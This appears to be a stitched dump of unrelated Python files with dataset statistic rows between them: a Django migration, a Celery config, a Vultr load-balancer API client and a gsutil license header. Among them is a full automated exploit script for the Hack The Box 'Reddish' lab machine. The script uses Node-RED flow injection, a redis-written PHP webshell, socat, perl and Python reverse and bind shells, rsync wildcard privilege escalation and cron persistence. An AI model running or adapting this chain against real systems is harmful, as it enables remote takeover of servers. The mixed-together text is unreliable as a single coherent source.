('djasana', '0006_adds_defaults'),
]
operations = [
migrations.AlterField(
model_name='task',
name='completed_at',
field=models.DateTimeField(null=True),
),
]
| 21.428571 | 50 | 0.615556 | 49 | 450 | 5.469388 | 0.836735 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063636 | 0.266667 | 450 | 20 | 51 | 22.5 | 0.748485 | 0.151111 | 0 | 0 | 1 | 0 | 0.108179 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6200daab351d8a43f810d28196ac2f8c75e8b726 | 803 | py | Python | Aves2/Aves2/celery.py | jd-aig/aves2 | 10aeb832feb94adf563f9795013c77bfd115b44e | [
"Apache-2.0"
] | 3 | 2020-09-24T01:36:02.000Z | 2022-03-28T11:53:54.000Z | Aves2/Aves2/celery.py | jd-aig/aves2 | 10aeb832feb94adf563f9795013c77bfd115b44e | [
"Apache-2.0"
] | null | null | null | Aves2/Aves2/celery.py | jd-aig/aves2 | 10aeb832feb94adf563f9795013c77bfd115b44e | [
"Apache-2.0"
] | 1 | 2020-12-08T05:14:23.000Z | 2020-12-08T05:14:23.000Z | # -*- coding:utf-8 -*-
from __future__ import absolute_import, unicode_literals
import os
from celery import Celery
from celery.schedules import crontab
# from celery_once import QueueOnce
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Aves2.settings')
app = Celery('Aves2')
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object('django.conf:settings', namespace='CELERY')
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
app.conf.timezone = 'Asia/Shanghai'
# Add periodic-tasks
app.conf.beat_schedule = {
}
| 27.689655 | 66 | 0.775841 | 111 | 803 | 5.486486 | 0.576577 | 0.049261 | 0.065681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004304 | 0.132005 | 803 | 28 | 67 | 28.678571 | 0.86944 | 0.499377 | 0 | 0 | 0 | 0 | 0.204082 | 0.056122 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
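crontab is imported above but beat_schedule is left empty; a sketch of how a periodic task could be registered on the app defined above (task path is hypothetical):

from celery.schedules import crontab

app.conf.beat_schedule = {
    'nightly-cleanup': {
        'task': 'job_manager.tasks.cleanup',  # hypothetical task name
        'schedule': crontab(hour=3, minute=0),
    },
}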
6202a8816bac81aec1be652ea835f294593e8695 | 12,009 | py | Python | pyvultr/v2/load_balance.py | luxiaba/pyvultr | 29b45d036f728c15d91c4b590bd893b9c7f609ae | [
"MIT"
] | 4 | 2021-12-01T18:06:18.000Z | 2022-01-22T12:39:52.000Z | pyvultr/v2/load_balance.py | luxiaba/pyvultr | 29b45d036f728c15d91c4b590bd893b9c7f609ae | [
"MIT"
] | 1 | 2021-12-19T14:05:42.000Z | 2021-12-19T14:05:42.000Z | pyvultr/v2/load_balance.py | luxiaba/pyvultr | 29b45d036f728c15d91c4b590bd893b9c7f609ae | [
"MIT"
] | 1 | 2021-12-20T04:54:08.000Z | 2021-12-20T04:54:08.000Z | from dataclasses import dataclass
from functools import partial
from typing import Dict, List, Optional
from urllib.parse import urljoin
from pyvultr.utils import BaseDataclass, VultrPagination, get_only_value, merge_args
from .base import BaseVultrV2, command
from .enums import LoadBalanceAlgorithm, LoadBalanceProtocol
@dataclass
class LoadBalanceGenericInfo(BaseDataclass):
# If true, this will redirect all HTTP traffic to HTTPS.
# You must have an HTTPS rule and SSL certificate installed on the load balancer to enable this option.
ssl_redirect: bool
    sticky_sessions: Dict  # Sticky-session cookie settings, e.g. {'cookie_name': 'xxx'}.
# ID of the private network you wish to use.
# If private_network is omitted it will default to the public network.
private_network: str
# The balancing algorithm, see `enums.LoadBalanceAlgorithm` for possible values.
balancing_algorithm: str = LoadBalanceAlgorithm.ROUND_ROBIN.value
# If true, you must configure backend nodes to accept Proxy protocol. default is false.
proxy_protocol: bool = False
@dataclass
class LoadBalanceHealthCheck(BaseDataclass):
protocol: str # The protocol to use for health checks, see `enums.LoadBalanceProtocol` for possible values.
port: int # The port to use for health checks.
path: str # HTTP Path to check. Only applies if Protocol is HTTP or HTTPS.
check_interval: int # Interval between health checks.
response_timeout: int # Timeout before health check fails.
unhealthy_threshold: int # Number times a check must fail before becoming unhealthy.
healthy_threshold: int # Number of times a check must succeed before returning to healthy status.
@dataclass
class LoadBalanceForwardRule(BaseDataclass):
id: str # A unique ID for the forwarding rule.
# The protocol on the Load Balancer to forward to the backend.
# see `enums.LoadBalanceProtocol` for possible values.
frontend_protocol: str
frontend_port: int # The port number on the Load Balancer to forward to the backend.
# The protocol destination on the backend server.
# see `enums.LoadBalanceProtocol` for possible values.
backend_protocol: str
backend_port: int # The port number destination on the backend server.
@dataclass
class LoadBalanceFirewallRule(BaseDataclass):
id: str # A unique ID for the firewall rule.
port: int # Port for this rule.
# If the source string is given a value of "cloudflare" then cloudflare IPs will be supplied.
# Otherwise enter a IP address with subnet size that you wish to permit through the firewall.
# | Value | Description
# | ---------------- | -----------
# | "192.168.1.1/16" | Ip address with a subnet size.
# | "cloudflare" | Allow all of Cloudflare's IP space through the firewall
source: str
ip_type: str # The type of IP rule, see `enums.IPType` for possible values.
@dataclass
class LoadBalance(BaseDataclass):
id: str # A unique ID for the Load Balancer.
date_created: str # Date this Load Balancer was created.
# The Region id where the instance is located, check `RegionAPI.list` and `RegionItem.id` for available regions.
region: str
label: str # The user-supplied label for this load-balancer.
status: str # The current status, see `enums.LoadBalanceStatus` for possible values.
ipv4: str # The IPv4 address of this Load Balancer.
ipv6: str # The IPv6 address of this Load Balancer.
generic_info: LoadBalanceGenericInfo # An object containing additional options.
health_check: LoadBalanceHealthCheck
has_ssl: bool # Indicates if this Load Balancer has an SSL certificate installed.
forwarding_rules: List[LoadBalanceForwardRule] # An array of forwarding rule objects.
instances: List[str] # Array of Instance ids attached to this Load Balancer.
firewall_rules: List[LoadBalanceFirewallRule] # An array of firewall rule objects.
class LoadBalanceAPI(BaseVultrV2):
"""Vultr LoanBalance API.
Reference: https://www.vultr.com/api/#tag/load-balancer
Load Balancers sit in front of your application and distribute incoming traffic across multiple Instances.
When you control the load balancer via the API, you can inspect the results in the customer portal.
Attributes:
api_key: Vultr API key, we get it from env variable `$VULTR_API_KEY` if not provided.
"""
def __init__(self, api_key: Optional[str] = None):
super().__init__(api_key)
@property
def base_url(self):
"""Get base url for all API in this section."""
return urljoin(super().base_url, "load-balancers")
@command
def list(self, per_page: int = None, cursor: str = None, capacity: int = None) -> VultrPagination[LoadBalance]:
"""List the Load Balancers in your account.
Args:
per_page: Number of items requested per page. Default is 100 and Max is 500.
cursor: Cursor for paging.
            capacity: The capacity of the VultrPagination[LoadBalance], see `VultrPagination` for details.
        Returns:
            VultrPagination[LoadBalance]: A list-like object of `LoadBalance` objects.
"""
return VultrPagination[LoadBalance](
fetcher=self._get,
cursor=cursor,
page_size=per_page,
return_type=LoadBalance,
capacity=capacity,
)
@command
def create(self, region: str, **kwargs) -> LoadBalance:
"""Create a new Load Balancer in a particular `region`.
Args:
region: The Region id to create this Load Balancer.
            **kwargs: New Load Balancer parameters.
Returns:
            LoadBalance: The created LoadBalance object.
"""
_fixed_kwargs = {"region": region}
resp = self._post(json=merge_args(kwargs, _fixed_kwargs))
return LoadBalance.from_dict(get_only_value(resp))
@command
def get(self, load_balancer_id: str) -> LoadBalance:
"""Get information for a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
Returns:
            LoadBalance: The LoadBalance object.
"""
resp = self._get(f"/{load_balancer_id}")
return LoadBalance.from_dict(get_only_value(resp))
@command
def update(self, load_balancer_id: str, **kwargs):
"""Update information for a Load Balancer.
All attributes are optional. If not set, the attributes will retain their original values.
Args:
            load_balancer_id: The Load Balancer id.
            **kwargs: Updated Load Balancer parameters.
Returns:
STATUS CODE: 204
/NO CONTENT/
"""
return self._patch(f"/{load_balancer_id}", json=kwargs)
@command
def delete(self, load_balancer_id: str):
"""Delete a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
Returns:
STATUS CODE: 204
/NO CONTENT/
"""
return self._delete(f"/{load_balancer_id}")
@command
def list_forwarding_rules(
self,
load_balancer_id: str,
per_page: int = None,
cursor: str = None,
capacity: int = None,
) -> VultrPagination[LoadBalanceForwardRule]:
"""List the forwarding rules for a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
per_page: number of items requested per page. Default is 100 and Max is 500.
cursor: cursor for paging.
capacity: The capacity of the VultrPagination[LoadBalanceForwardRule], see `VultrPagination` for details.
Returns:
            VultrPagination[LoadBalanceForwardRule]: A list-like object of `LoadBalanceForwardRule` objects.
"""
fetcher = partial(self._get, endpoint=f"/{load_balancer_id}/forwarding-rules")
return VultrPagination[LoadBalanceForwardRule](
fetcher=fetcher,
cursor=cursor,
page_size=per_page,
return_type=LoadBalanceForwardRule,
capacity=capacity,
)
@command
def create_forwarding_rule(
self,
load_balancer_id: str,
frontend_protocol: LoadBalanceProtocol,
frontend_port: int,
backend_protocol: LoadBalanceProtocol,
backend_port: int,
) -> LoadBalanceForwardRule:
"""Create a new forwarding rule for a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
frontend_protocol: The protocol on the Load Balancer to forward to the backend.
frontend_port: The port number on the Load Balancer to forward to the backend.
backend_protocol: The protocol destination on the backend server.
backend_port: The port number destination on the backend server.
Returns:
LoadBalanceForwardRule: A `LoadBalanceForwardRule` object.
"""
_json = {
"frontend_protocol": frontend_protocol.value,
"frontend_port": frontend_port,
"backend_protocol": backend_protocol.value,
"backend_port": backend_port,
}
resp = self._post(f"/{load_balancer_id}/forwarding-rules", json=_json)
return LoadBalanceForwardRule.from_dict(get_only_value(resp))
@command
def get_forwarding_rule(self, load_balancer_id: str, forwarding_rule_id: str) -> LoadBalanceForwardRule:
"""Get information for a Forwarding Rule on a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
forwarding_rule_id: The Forwarding Rule id.
Returns:
LoadBalanceForwardRule: A `LoadBalanceForwardRule` object.
"""
resp = self._get(f"/{load_balancer_id}/forwarding-rules/{forwarding_rule_id}")
return LoadBalanceForwardRule.from_dict(get_only_value(resp))
@command
def delete_forwarding_rule(self, load_balancer_id: str, forwarding_rule_id: str):
"""Delete a Forwarding Rule on a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
forwarding_rule_id: The Forwarding Rule id.
Returns:
STATUS CODE: 204
/NO CONTENT/
"""
return self._delete(f"/{load_balancer_id}/forwarding-rules/{forwarding_rule_id}")
@command
def list_firewall_rules(
self,
load_balancer_id: str,
per_page: int = None,
cursor: str = None,
capacity: int = None,
) -> VultrPagination[LoadBalanceFirewallRule]:
"""List the firewall rules for a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
per_page: number of items requested per page. Default is 100 and Max is 500.
cursor: cursor for paging.
capacity: The capacity of the VultrPagination[LoadBalanceFirewallRule], see `VultrPagination` for details.
Returns:
            VultrPagination[LoadBalanceFirewallRule]: A list-like object of `LoadBalanceFirewallRule` objects.
"""
fetcher = partial(self._get, endpoint=f"/{load_balancer_id}/firewall-rules")
return VultrPagination[LoadBalanceFirewallRule](
fetcher=fetcher,
cursor=cursor,
page_size=per_page,
return_type=LoadBalanceFirewallRule,
capacity=capacity,
)
@command
def get_firewall_rule(self, load_balancer_id: str, forwarding_rule_id: str) -> LoadBalanceFirewallRule:
"""Get a firewall rule for a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
forwarding_rule_id: The firewall rule id.
Returns:
LoadBalanceFirewallRule: A `LoadBalanceFirewallRule` object.
"""
resp = self._get(f"/{load_balancer_id}/firewall-rules/{forwarding_rule_id}")
return LoadBalanceFirewallRule.from_dict(get_only_value(resp))
| 39.117264 | 118 | 0.670081 | 1,417 | 12,009 | 5.545519 | 0.190543 | 0.07941 | 0.048104 | 0.020616 | 0.444642 | 0.376559 | 0.328582 | 0.313948 | 0.266353 | 0.250445 | 0 | 0.004815 | 0.256391 | 12,009 | 306 | 119 | 39.245098 | 0.87514 | 0.486802 | 0 | 0.340426 | 0 | 0 | 0.075758 | 0.050813 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092199 | false | 0 | 0.049645 | 0 | 0.510638 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
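A hedged client sketch for the API above (API key, label, and region id are placeholders; import path assumed):

from pyvultr.v2.load_balance import LoadBalanceAPI  # assumed import path

api = LoadBalanceAPI(api_key="YOUR_VULTR_API_KEY")
for lb in api.list(capacity=5):
    print(lb.id, lb.label, lb.status)
new_lb = api.create(region="ewr", label="demo-lb")  # extra kwargs pass through to the POST body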
62034dcbe266726fc371d74a18776dc2103cd7d1 | 12,848 | py | Python | hacking/HTB/Reddish/autopwn_reddish.py | Qazeer/code-snippets | 6b15afb66312cbcf7c29f9ea32933ad0cbf65154 | [
"Unlicense"
] | 219 | 2017-12-12T20:05:37.000Z | 2022-03-27T06:08:08.000Z | hacking/HTB/Reddish/autopwn_reddish.py | FDlucifer/code-snippets | 2635cf04bc90f1cd0e6b850a9b70d689f1ab7aba | [
"Unlicense"
] | 3 | 2018-11-10T13:33:42.000Z | 2020-10-21T13:53:00.000Z | hacking/HTB/Reddish/autopwn_reddish.py | FDlucifer/code-snippets | 2635cf04bc90f1cd0e6b850a9b70d689f1ab7aba | [
"Unlicense"
] | 108 | 2017-12-17T18:17:14.000Z | 2022-03-15T13:24:44.000Z | #!/usr/bin/env python2
# Author: Alamot
import json
import time
import uuid
import fcntl
import base64
import urllib
import random
import requests
from pwn import *
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15].encode())
)[20:24])
# context.log_level = 'debug'
LHOST = get_ip_address('tun0')
LPORT1 = "60000"
LPORT2 = str(random.randint(60003, 62535))
LPORT3 = str(random.randint(62535, 65535))
LPORT4 = "60001"
UUIDNAME = str(uuid.uuid4())[:8]
SOCAT_SRCPATH = "socat"
SOCAT_DSTPATH = "/var/tmp/socat" + UUIDNAME
SUBASH_PATH = "/var/tmp/" + UUIDNAME
CRONPL_PATH = "/tmp/" + UUIDNAME
def send_payloads():
session = requests.Session()
# Get id
p1 = log.progress("Getting our id")
headers = {"User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Connection":"close","Accept-Language":"en","Accept":"*/*"}
try:
response = session.post("http://10.10.10.94:1880/", headers=headers)
if response.status_code != 200:
p1.failure("Status "+str(response.status_code))
sys.exit()
else:
            uid = json.loads(response.text)["id"].strip()
p1.success("OK (id = " + uid + ")")
except requests.exceptions.RequestException as e:
p1.failure(str(e))
sys.exit()
# Load flows
p2 = log.progress("Loading node-red flows")
with open(SOCAT_SRCPATH, 'r') as f:
b64upload = base64.b64encode(f.read())
rawBody = "{\"flows\":[{\"id\":\"e97f052f.2f3d48\",\"type\":\"tab\",\"label\":\"Flow 1\"},{\"id\":\"6c08c84b.d9c578\",\"type\":\"inject\",\"z\":\"e97f052f.2f3d48\",\"name\":\"\",\"topic\":\"\",\"payload\":\"node -e '(function(){ var cp = require(\\\"child_process\\\"), sh = cp.spawn(\\\"/bin/sh\\\", [\\\"-c\\\", \\\"cat " + SOCAT_DSTPATH + ".b64 | base64 -d > " +SOCAT_DSTPATH + " && chmod +x " + SOCAT_DSTPATH + " && " + SOCAT_DSTPATH + " exec:/bin/bash,pty,rawer,echo=0,stderr,setsid,sigint tcp:" + LHOST + ":" + LPORT1 + "\\\"]); return /a/; })();'\",\"payloadType\":\"str\",\"repeat\":\"\",\"crontab\":\"\",\"once\":false,\"onceDelay\":0.1,\"x\":151,\"y\":88,\"wires\":[[\"d27da06a.44a1a\"]]},{\"id\":\"d27da06a.44a1a\",\"type\":\"exec\",\"z\":\"e97f052f.2f3d48\",\"command\":\"\",\"addpay\":true,\"append\":\"\",\"useSpawn\":\"false\",\"timer\":\"\",\"oldrc\":false,\"name\":\"\",\"x\":310,\"y\":80,\"wires\":[[],[],[]]},{\"id\":\"fae51292.d8e68\",\"type\":\"inject\",\"z\":\"e97f052f.2f3d48\",\"name\":\"\",\"topic\":\"\",\"payload\":\"" + b64upload +"\",\"payloadType\":\"str\",\"repeat\":\"\",\"crontab\":\"\",\"once\":false,\"onceDelay\":0.1,\"x\":113,\"y\":260,\"wires\":[[\"7e1e7cb5.664234\"]]},{\"id\":\"7e1e7cb5.664234\",\"type\":\"file\",\"z\":\"e97f052f.2f3d48\",\"name\":\"\",\"filename\":\"" + SOCAT_DSTPATH +".b64\",\"appendNewline\":false,\"createDir\":false,\"overwriteFile\":\"true\",\"x\":320,\"y\":260,\"wires\":[]}]}"
headers = {"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0","Referer":"http://10.10.10.94:1880/red/"+uid+"/flows","Node-RED-API-Version":"v2","Connection":"close","Accept-Language":"en-US,en;q=0.5","DNT":"1","Content-Type":"application/json; charset=utf-8","Node-RED-Deployment-Type":"full"}
try:
response = session.post("http://10.10.10.94:1880/red/"+uid+"/flows", data=rawBody, headers=headers)
if response.status_code != 200:
p2.failure("Status "+str(response.status_code))
sys.exit()
else:
p2.success("OK")
except requests.exceptions.RequestException as e:
p2.failure(str(e))
sys.exit()
# Inject base64-encoded socat
p3 = log.progress("Injecting base64-encoded socat")
headers = {"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0","Referer":"http://10.10.10.94:1880/red/"+uid+"/inject/fae51292.d8e68","Node-RED-API-Version":"v2","Connection":"close","Accept-Language":"en-US,en;q=0.5","DNT":"1"}
try:
response = session.post("http://10.10.10.94:1880/red/"+uid+"/inject/fae51292.d8e68", headers=headers)
if response.status_code != 200:
p3.failure("Status "+str(response.status_code))
sys.exit()
else:
p3.success("OK")
except requests.exceptions.RequestException as e:
p3.failure(str(e))
sys.exit()
# Inject nodejs reverse shell
p4 = log.progress("Injecting socat reverse shell via nodejs [" + LHOST + ":" + str(LPORT1) + "]")
headers = {"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0","Referer":"http://10.10.10.94:1880/red/" + uid + "/inject/6c08c84b.d9c578","Node-RED-API-Version":"v2","Connection":"close","Accept-Language":"en-US,en;q=0.5","DNT":"1"}
try:
response = session.post("http://10.10.10.94:1880/red/" + uid + "/inject/6c08c84b.d9c578", headers=headers)
if response.status_code != 200:
p4.failure("Status "+str(response.status_code))
sys.exit()
else:
p4.success("OK")
except requests.exceptions.RequestException as e:
p4.failure(str(e))
sys.exit()
print("What shell do you want?")
print("[1] root@nodered")
print("[2] www-data@www")
print("[3] root@www")
print("[4] root@backup")
print("[5] root@reddish")
print("[6] Exit")
response = None
while response not in ["1", "2", "3", "4", "5", "6"]:
response = raw_input("Please enter a number 1-6: ").strip()
if response == "6":
sys.exit()
try:
threading.Thread(target=send_payloads).start()
except Exception as e:
log.error(str(e))
socat = listen(LPORT1, bindaddr=LHOST, timeout=20).wait_for_connection()
if response == "1":
socat.interactive()
sys.exit()
with log.progress("Uploading " + UUIDNAME + ".php on the www container via redis") as p:
socat.sendline("/bin/echo -ne '*1\\r\\n$8\\r\\nFLUSHALL\\r\\n*3\\r\\n$3\\r\\nSET\\r\\n$1\\r\\n1\\r\\n$45\\r\\n<?php echo shell_exec($_GET[\"e\"].\" 2>&1\"); ?>\\r\\n*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$10\\r\\ndbfilename\\r\\n$12\\r\\n" + UUIDNAME + ".php\\r\\n*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$3\\r\\ndir\\r\\n$46\\r\\n/var/www/html/8924d0549008565c554f8128cd11fda4\\r\\n*1\\r\\n$4\\r\\nSAVE\\r\\n' | " + SOCAT_DSTPATH + " - TCP:redis:6379")
socat.sendline("/bin/echo -ne 'GET /8924d0549008565c554f8128cd11fda4/" + UUIDNAME+ ".php?e=$(whoami)@$(hostname)END HTTP/1.1\\r\\nHost: nodered\\r\\nUser-agent: curl\\r\\n\\r\\n' | " + SOCAT_DSTPATH + " - TCP:www:80")
output = socat.recvuntil("www-data@www")
if "www-data@www" in output:
p.success("OK (user = www-data@www)")
else:
p.failure("FAIL")
sys.exit()
with log.progress("Sending perl bind shell [www-data@www:" + str(LPORT2) + "] via " + UUIDNAME + ".php & trying to connect") as p:
perl_payload = "perl -e 'use Socket;$p=" + str(LPORT2) +";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};'"
urled_perl_payload = urllib.quote_plus(perl_payload)
socat.sendline("/bin/echo -ne 'GET /8924d0549008565c554f8128cd11fda4/" + UUIDNAME + ".php?e=" + urled_perl_payload + " HTTP/1.1\\r\\nHost: nodered\\r\\nUser-Agent: curl\\r\\n\\r\\n' | " + SOCAT_DSTPATH + " - TCP:www:80")
socat.sendline(SOCAT_DSTPATH + " file:`tty`,echo=0,rawer TCP:www:" + str(LPORT2))
output = socat.recvuntil("shell", timeout=20)
if "shell" in output:
p.success("OK")
else:
p.failure("FAIL")
sys.exit()
socat.sendline("script --return -c '/bin/bash -i' /dev/null")
socat.clean(1)
socat.sendline("stty raw -echo")
if response == "2":
socat.interactive()
sys.exit()
with log.progress("Exploiting wildcards for privesc. Wait at most 180 secs for rsync backup job to run") as p:
socat.sendline('echo "/bin/cp /bin/bash ' + SUBASH_PATH + ';/bin/chmod 4755 ' + SUBASH_PATH + '" > "/var/www/html/f187a0ec71ce99642e4f0afbd441a68b/' + UUIDNAME + '.rdb"')
socat.sendline('touch "/var/www/html/f187a0ec71ce99642e4f0afbd441a68b/-e sh ' + UUIDNAME + '.rdb"')
count = 0
while True:
p.status(str(count))
sleep(1)
socat.sendline("[ -f " + SUBASH_PATH + " ] && echo 'OK' || echo 'NO'")
socat.recvuntil('$ ')
output = socat.recv(3).strip()
if "OK" in output:
p.success("OK")
break
count += 1
if count > 180:
p.failure("FAIL")
sys.exit()
socat.sendline(SUBASH_PATH + ' -i -p')
socat.sendline("cd /root")
socat.clean(1)
if response == "3":
socat.interactive()
sys.exit()
with log.progress("Sending a cronjob for bind shell [root@backup:" +str(LPORT3)+ "]. Please wait") as p:
socat.sendline("echo 'use Socket;$p=" + str(LPORT3) + ";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};' > " + CRONPL_PATH + ".pl")
socat.sendline("echo '* * * * * root /usr/bin/perl " + CRONPL_PATH + ".pl' > " + CRONPL_PATH + "cronjob")
socat.sendline("rsync -a " + CRONPL_PATH + ".pl backup::src" + CRONPL_PATH + ".pl")
socat.sendline("rsync -a " + CRONPL_PATH + "cronjob backup::src/etc/cron.d/")
for i in range(62):
p.status(str(61 - i))
time.sleep(1)
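    # The perl one-liner below is a minimal non-blocking TCP relay: it
    # connects to backup:LPORT3 and shuttles bytes between that socket and
    # the current stdin/stdout, standing in for nc/socat on this container.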
socat.sendline("perl -MFcntl=F_SETFL,F_GETFL,O_NONBLOCK -MSocket '-e$0=perl;socket($c,AF_INET,SOCK_STREAM,0)&&connect($c,pack_sockaddr_in("+ str(LPORT3) + ",inet_aton(\"backup\")))||die$!;fcntl$_,F_SETFL,O_NONBLOCK|fcntl$_,F_GETFL,0 for@d=(*STDIN,$c),@e=($c,*STDOUT);L:for(0,1){sysread($d[$_],$f,8**5)||exit and$f[$_].=$f if vec$g,$_*($h=fileno$c),1;substr$f[$_],0,syswrite($e[$_],$f[$_],8**5),\"\";vec($g,$_*$h,1)=($i=length$f[$_]<8**5);vec($j,$_||$h,1)=!!$i}select$g,$j,$k,5;goto L'")
output = socat.recvuntil("shell", timeout=20)
if "shell" in output:
p.success("OK")
else:
p.failure("FAIL")
sys.exit()
socat.sendline("script --return -c '/bin/bash -i' /dev/null")
socat.clean(1)
socat.sendline("stty raw -echo")
if response == "4":
socat.interactive()
sys.exit()
with log.progress("Sending reverse shell cronjob [" + LHOST + ":" +str(LPORT4)+ "] for root@host. Please wait") as p:
socat.sendline("mkdir /mnt/sda1")
socat.sendline("mount /dev/sda1 /mnt/sda1")
socat.sendline("cat /mnt/sda1/root/root.txt")
socat.sendline("echo 'import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(LPORT4) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn([\"/bin/bash\",\"-i\"]);s.close();exit();' > /mnt/sda1/tmp/" + UUIDNAME + ".py")
socat.sendline("echo '* * * * * root /usr/bin/python /tmp/" + UUIDNAME + ".py' > /mnt/sda1/etc/cron.d/" + UUIDNAME + "cronjob")
host_shell = listen(LPORT4, bindaddr=LHOST, timeout=65).wait_for_connection()
if host_shell.sock is None:
p.failure("FAIL")
sys.exit()
else:
p.success("OK")
host_shell.interactive()
sys.exit()
'''
$ ./autopwn_reddish.py
What shell do you want?
[1] root@nodered
[2] www-data@www
[3] root@www
[4] root@backup
[5] root@reddish
[6] Exit
Please enter a number 1-6: 5
[+] Getting our id: OK (id = 25af4604ab3402f2bdea796ac32bbcc3)
[+] Trying to bind to 10.10.12.229 on port 60000: Done
[+] Waiting for connections on 10.10.12.229:60000: Got connection from 10.10.10.94 on port 46784
[+] Loading node-red flows: OK
[+] Injecting base64-encoded socat: OK
[+] Injecting socat reverse shell via nodejs [10.10.12.229:60000]: OK
[+] Uploading 1994851d.php on the www container via redis: OK (user = www-data@www)
[+] Sending perl bind shell [www-data@www:61031] via 1994851d.php & trying to connect: OK
[+] Exploiting wildcards for privesc. Wait at most 180 secs for rsync backup job to run: OK
[+] Sending a cronjob for bind shell [root@backup:65104]. Please wait: OK
[+] Sending reverse shell cronjob [10.10.12.229:60001] for root@host. Please wait: OK
[+] Trying to bind to 10.10.12.229 on port 60001: Done
[+] Waiting for connections on 10.10.12.229:60001: Got connection from 10.10.10.94 on port 50432
[*] Switching to interactive mode
root@reddish:~# $
'''
| 53.090909 | 1,448 | 0.611768 | 1,847 | 12,848 | 4.203032 | 0.22144 | 0.006441 | 0.006956 | 0.009275 | 0.512044 | 0.464511 | 0.412598 | 0.36339 | 0.303491 | 0.261754 | 0 | 0.076675 | 0.154421 | 12,848 | 241 | 1,449 | 53.311203 | 0.637887 | 0.011675 | 0 | 0.347826 | 0 | 0.092391 | 0.42711 | 0.148643 | 0 | 0 | 0.00052 | 0 | 0 | 1 | 0.01087 | false | 0 | 0.054348 | 0 | 0.070652 | 0.038043 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
620690da1f145b5b2420aa8da8460ba8aab12a29 | 9,636 | py | Python | google-cloud-sdk/platform/gsutil/gslib/commands/notification.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | 1 | 2017-11-29T18:52:27.000Z | 2017-11-29T18:52:27.000Z | google-cloud-sdk/.install/.backup/platform/gsutil/gslib/commands/notification.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | null | null | null | google-cloud-sdk/.install/.backup/platform/gsutil/gslib/commands/notification.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | 1 | 2020-07-25T12:09:01.000Z | 2020-07-25T12:09:01.000Z | # -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
